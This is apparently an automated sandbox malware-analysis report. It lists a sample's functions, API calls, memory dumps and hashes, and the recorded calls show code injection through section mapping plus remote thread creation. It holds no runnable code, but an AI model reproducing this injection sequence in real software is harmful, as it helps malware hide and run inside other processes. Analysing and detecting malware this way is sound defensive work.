Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 008511C2 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00851213

Memory Dump Source

Source File: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0084E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84e000_HaPJ2rPP6w.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: aeca5b9af20098b71272df208fbef36ba55aaaae5bba9500b4d1fc4f960441fc
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: AE112B79A00208EFDB01DF98C989E98BBF5EF08351F058094F9489B362D771EA50DB80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 004164A0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00511CE4,00416AC7), ref: 004164A8

Memory Dump Source

Source File: 00000000.00000002.1783476903.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_HaPJ2rPP6w.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: f108658839a774f3ec8041a38e7b5c842f30d111f5bdb726fd1b9c974fc00c67
Instruction ID: 0e1443596e4cadc07de741eab66e71947b5663c851de1fa4f156f6081f94fab8
Opcode Fuzzy Hash: f108658839a774f3ec8041a38e7b5c842f30d111f5bdb726fd1b9c974fc00c67
Instruction Fuzzy Hash: 95B092B41896009BD2008BB0AD04BD03AA4A318302F008191F700C51A0DA201808AF1C

Non-executed Functions

Function 006B092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 006B0966
GetProcAddress., xrefs: 006B09DC, 006B09DF, 006B09E4
., xrefs: 006B095F

Memory Dump Source

Source File: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_HaPJ2rPP6w.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 254654e92616fbed97a9e78bff470e723ef2f09cb09b4f77d6b80293d0aaa023
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 29316CB6900609DFEB10CF99C880AEEBBF6FF48324F24514AD441A7351D771EA85CBA4

Function 00850DE0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0084E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84e000_HaPJ2rPP6w.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: e6cd66ab24a90b427e710bfac6420b71905d8a9ee3df92486e1744edcc1a43f8
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 3F11AC72340100AFDB44CE59DC92EA273EAFB88320B2984A5ED08CB306D675EC01CB60

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 006B0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_HaPJ2rPP6w.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 234ba53533d4c3da5cb596b1fc6310159d7d1ff50711d85f8090656b9c3ca7e8
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0D01A7B66006048FEF21CF64C805BEB37E6FF85315F4545E5D50697381E774A9818B90

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Function 00416720 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416754
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041676F
HeapDestroy.KERNEL32(00000000), ref: 0041678E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 0041679D

Memory Dump Source

Source File: 00000000.00000002.1783476903.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_HaPJ2rPP6w.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: b64c93f38c0632519a7331ea2ffcdac579a561a96d48f66aef6059a363055a99
Instruction ID: bfda60e46cdd917eef3824eff81274299ff88806db2d43078e848f831fad2497
Opcode Fuzzy Hash: b64c93f38c0632519a7331ea2ffcdac579a561a96d48f66aef6059a363055a99
Instruction Fuzzy Hash: B301B1716852049BD710EBA4ED45BDA7B78A70C31AF0040A6F709D62D0DA3499888B6E

Analysis Process: wideaecPID: 7736, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	28.2%
Signature Coverage:	0%
Total number of Nodes:	174
Total number of Limit Nodes:	6

Executed Functions

Function 004167C0 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 299
windowtimefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004168DA
GetFocus.USER32 ref: 004168E0
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004168ED
FindAtomW.KERNEL32(00000000), ref: 004168F4
SetConsoleMode.KERNEL32(00000000,00000000), ref: 004168FC
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00416923
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041692C
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00416942
GetEnvironmentStringsW.KERNEL32 ref: 00416948
ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041698D
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041699C
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004169A5
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004169BA
ReleaseMutex.KERNEL32(00000000), ref: 004169CA
SetCommState.KERNELBASE(00000000,00000000), ref: 004169F4
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00416A25
GetComputerNameW.KERNEL32(?,?), ref: 00416A39
GetFileAttributesA.KERNEL32(00000000), ref: 00416A40
GetConsoleAliasExesLengthA.KERNEL32 ref: 00416A46
GetBinaryType.KERNEL32(0041834C,?), ref: 00416A58
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00416A6B
GetLongPathNameW.KERNEL32(00418360,?,00000000), ref: 00416A7E
GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00416A86
LoadLibraryW.KERNELBASE(00418374), ref: 00416B12

Strings

k`, xrefs: 00416B4D
}$, xrefs: 00416B71

Memory Dump Source

Source File: 00000005.00000002.2053825637.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wideaec.jbxd

Similarity

API ID: Console$CommFileName$LengthRead$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultEnvironmentExchangeExesFindFocusFormatInterlockedLibraryLoadLongMessageModeModuleMutexObjectOutputPathPipePrivilegeReleaseStateStringsSystemTimeTimeoutsType
String ID: k`$}$
API String ID: 4079765171-956986773
Opcode ID: 8a8c107c90811e6390bac5a4fc857e8bc3aa7e6139d6a18d575a9703efd087d7
Instruction ID: 66b7ba66da8bb5d3bd80010fb135f4a1ed8397abbfee7ed1f5eca20cf58200d5
Opcode Fuzzy Hash: 8a8c107c90811e6390bac5a4fc857e8bc3aa7e6139d6a18d575a9703efd087d7
Instruction Fuzzy Hash: 6DA1D571846624ABC720EB61DC45BDF7B78EF4D314F0180AAF609A3161DB385A85CBED

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wideaec.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wideaec.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wideaec.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wideaec.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wideaec.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wideaec.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 0063003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0063024D

Strings

kernel32.dll, xrefs: 0063008F, 00630095
cess, xrefs: 0063018D

Memory Dump Source

Source File: 00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_630000_wideaec.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
